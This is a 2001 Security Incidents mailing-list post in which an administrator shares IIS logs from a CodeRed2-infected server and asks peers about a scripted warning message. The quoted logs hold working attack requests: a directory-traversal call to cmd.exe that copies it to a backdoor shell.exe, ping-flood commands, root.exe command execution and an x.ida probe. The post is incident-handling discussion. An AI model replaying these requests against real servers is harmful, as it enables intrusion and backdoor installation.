Security Incidents mailing list archives

Scripted CodeRed2 reply


From: "Chris Curtiss" <xrayspx () xrayspx com>
Date: 14 Aug 2001 09:57:09 EDT

I have seen this idea floating around the focus-linux list the last couple of
days, and I have now seen this in person.  I am not at all in favor of shutting
down or crashing remote vulnerable servers.  You just really never know how
important that machine may be, there may be a very good reason the admins are
leaving it running until they can take it out of service safely.  

However, what follows is a very polite notice, and very attention grabbing.  I
just started with a new company, and it's the last thing I would have wanted to
see, but at least the guy didn't crash the machine; I would have had a far
worse day.


2001-08-13 20:19:42 24.xx.xxx.xxx - xx.xx.xx.xxx 80 GET /scripts/root.exe /c+net+send+localhost+%22Your+webserver+has+been+infected+with+the+CodeRed2+worm.+You+have+a+security+hole+so+big+that+you+can+drive+a+Mack+truck+through+it.+You+should+fix+it+before+some+script+kiddie+comes+along+and+takes+advantage+of+it.++Remove+root.exe+and+shell.exe+from+c:%5Cinetpub%5Cscripts+(or+wherever+your+CGI+scripts+live,+though+c:%5Cinetpub%5Cscripts+is+the+default+location).%22 502 Lynx/2.8.4dev.7+libwww-FM/2.14

From what I understand, this machine was not even known to be running IIS at
all.  After further investigation I found it to have been previously rooted on
6/19/01:

2001-06-19 12:22:16 209.xxx.xx.xx - xx.xx.xx.xxx 80 GET
/scripts/../../winnt/system32/cmd.exe
/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\shell.exe 502 -
2001-06-19 14:47:50 209.xxx.xx.xx - xx.xx.xx.xxx 80 GET
/scripts/../../winnt/system32/cmd.exe
/c+ping+-v+network-prohibited%20-n++-l+65500+-w+0+ 502 -
2001-06-19 14:58:50 209.xxx.xx.xx - xx.xx.xx.xxx 80 GET
/scripts/../../winnt/system32/cmd.exe
/c+ping+-v+network-unknown%20-n++-l+65500+-w+0+ 502 -
2001-06-19 17:10:44 209.xxx.xx.xx - xx.xx.xx.xxx 80 GET
/scripts/../../winnt/system32/cmd.exe
/c+ping+-v+network-unreachable%20-n++-l+65500+-w+0+ 502 -

Does the above look like a script anyone has seen previously?  I also had quite
a few of these, all from the same IP, on different days:

2001-07-31 14:36:42 192.xx.xx.xxx - xx.xx.xx.xxx 80 GET /iisstart.asp - 200 -
2001-07-31 14:36:44 192.xx.xx.xxx - xx.xx.xx.xxx 80 GET /x.ida
AAAAAAAAAAAAAAAAA-snip-

I haven't seen anything searching for x.ida before, and this was like once a
day, on about 4 different days, I thought that was odd.

This machine has been taken out of service and replaced, but that is secondary.
Has anyone else seen the same scripted response to an infected CodeRed server?
This popped up a dialog box essentially saying "You've been owned, fix it",
but not causing any reboots or crashes, and certainly not any measures as
extreme as I've seen tossed about recently.

Chris Curtiss
xrayspx () xrayspx com
--a unix admin in an NT world--



----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

